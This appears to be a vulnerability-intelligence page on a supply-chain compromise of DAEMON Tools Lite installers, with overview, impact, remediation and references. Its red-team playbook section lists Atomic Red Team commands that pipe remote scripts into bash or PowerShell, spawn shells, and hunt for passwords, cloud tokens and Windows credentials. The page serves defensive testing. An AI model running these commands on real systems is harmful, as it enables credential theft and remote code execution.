CVE-2026-8398
Overview
This vulnerability is a supply chain compromise affecting the build and distribution process of AVB Disc Soft's DAEMON Tools Lite Windows installer packages, specifically versions 12.5.0.2421 through 12.5.0.2434. The root cause is unauthorized access to the vendor's build infrastructure, allowing attackers to inject malicious code into three signed binaries (DTHelper.exe, DiscSoftBusServiceLite.exe, DTShellHlp.exe). The trojanized binaries maintain valid digital signatures, impacting the integrity verification mechanism of the installation process.
Vulnerability Description
A supply chain attack compromised the official installation packages of DAEMON Tools Lite (Windows versions 12.5.0.2421 through 12.5.0.2434), distributed from the legitimate website daemon-tools.cc between approximately April 8, 2026, and May 5, 2026. Attackers gained unauthorized access to the vendor's (AVB Disc Soft) build or distribution infrastructure and trojanized three binaries: DTHelper.exe, DiscSoftBusServiceLite.exe, and DTShellHlp.exe. These files were digitally signed with the legitimate AVB Disc Soft code-signing certificate, allowing the malicious installers to appear trustworthy and bypass signature-based detection.
Impact
An attacker exploiting this supply chain compromise can execute arbitrary code with the privileges of the installed software on affected systems without requiring any user interaction or authentication. This enables full system compromise, including potential data exfiltration, persistence, and lateral movement within the network. Since the malicious binaries are signed with a legitimate certificate, endpoint security solutions relying on signature validation may fail to detect the threat, increasing the risk of widespread infection and operational disruption.
Solution
AVB Disc Soft has publicly acknowledged the security incident and released updated DAEMON Tools Lite installers beyond version 12.5.0.2434 to replace compromised versions. Users should immediately update to the latest version available from the official daemon-tools.cc website. Detailed remediation instructions and advisory information are provided in the vendor's security incident blog post at https://blog.daemon-tools.cc/post/security-incident. No specific workaround is recommended beyond updating to patched versions.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A significant vulnerability has emerged due to a supply chain attack that compromised the official installation packages of a popular software tool for Windows. This incident involved unauthorized access to the vendor's build and distribution infrastructure, leading to the trojanization of key binaries within the software. The attackers manipulated three specific executables, which were then digitally signed with the legitimate code-signing certificate of the vendor, creating a facade of trustworthiness. This manipulation allowed the malicious installers to evade signature-based detection mechanisms, posing a severe risk to users who downloaded the compromised software during a specific timeframe.
The primary attack vector in this scenario was the infiltration of the vendor's distribution pipeline. By breaching the build environment, attackers were able to replace legitimate binaries with malicious versions. Users who downloaded the software during the affected period unwittingly installed these trojanized executables, which could lead to various exploitation scenarios. Once executed, the malicious binaries could perform a range of harmful actions, such as establishing backdoors, exfiltrating sensitive data, or deploying additional malware. The use of a legitimate code-signing certificate significantly increased the likelihood of successful exploitation, as users and security systems would likely trust the software based on its digital signature.
The real-world impact of this vulnerability is profound, particularly for businesses that rely on the affected software for their operations. Organizations that installed the compromised versions could face severe consequences, including data breaches, financial losses, and reputational damage. The trust that users place in software vendors is critical; once compromised, it can lead to a loss of customer confidence and potential legal ramifications. Furthermore, the incident underscores the broader risks associated with supply chain vulnerabilities, where the integrity of third-party software can directly affect an organization’s security posture.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. First, it is essential to conduct a thorough inventory of all software installations to identify any instances of the compromised binaries. Regular audits and monitoring of software integrity can help detect unauthorized changes. Additionally, organizations should ensure that they are using the latest versions of software and apply patches promptly. Employing advanced threat detection solutions that utilize behavioral analysis can also help identify malicious activities that may arise from compromised software. Furthermore, educating employees about the risks of downloading software from unofficial sources can reduce the likelihood of falling victim to similar attacks in the future.
In conclusion, the supply chain attack that compromised the installation packages of a widely used software tool highlights critical vulnerabilities within software distribution processes. The ability of attackers to manipulate trusted binaries poses a significant threat to users and organizations alike. By understanding the technical details of such vulnerabilities, recognizing potential attack vectors, and implementing robust detection and mitigation strategies, organizations can better protect themselves against the evolving landscape of cybersecurity threats. The incident serves as a stark reminder of the importance of maintaining vigilance in software supply chains and the need for continuous improvement in security practices.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2026-8398, evidenced by a significant surge in telemetry signals indicating attempts to exploit the compromised DAEMON Tools Lite binaries. This increase coincides with the vulnerability’s recent addition to the CISA Known Exploited Vulnerabilities (KEV) catalog, underscoring its elevated priority for cybersecurity defenses. The Exploit Prediction Scoring System (EPSS) score has also risen sharply, reflecting growing confidence in the likelihood of exploitation in the near term. Although no new exploit variants or ransomware linkages have been identified, the rapid uptick in detection frequency signals that threat actors are increasingly leveraging this supply chain compromise to target Windows environments. For defenders, this shift elevates the urgency to monitor for indicators associated with the trojanized binaries and to prioritize mitigation efforts accordingly. The evolving exploitation landscape and heightened visibility in authoritative vulnerability tracking platforms collectively raise the threat level from critical to an active and emergent risk, demanding sustained vigilance.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Disc-Soft | Daemon Tools | 12.5.1 |
cpe:2.3:a:disc-soft:daemon_tools:12.5.1:*:*:*:lite:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
9 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Sighting activity recorded
Active exploitation confirmed — vendor: Daemon, product: Daemon Tools Lite
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (7)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-442 | Infected Software |
33%
|
Medium | High | |
| CAPEC-636 | Hiding Malicious Data or Code within Files |
33%
|
— | High | |
| CAPEC-448 | Embed Virus into DLL |
30%
|
Medium | High |
Red Team Playbook
45 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach --rm -i -- bash -lc "mkdir -p /tmp/test && cd /tmp/test && npm init -y >/dev/null 2>&1 && echo '--- package.json before install ---' && cat package.json && npm install #{package_name} --no-audit --no-fund --no-package-lock && echo '--- package.json after install ---' && cat package.json"
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-8398 |
| securelist.com |
GitHub CVE
technical-description
third-party-advisory
|
https://securelist.com/tr/daemon-tools-backdoor/119654/ |
| blog.daemon-tools.cc |
GitHub CVE
vendor-advisory
|
https://blog.daemon-tools.cc/post/security-incident |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-8398 |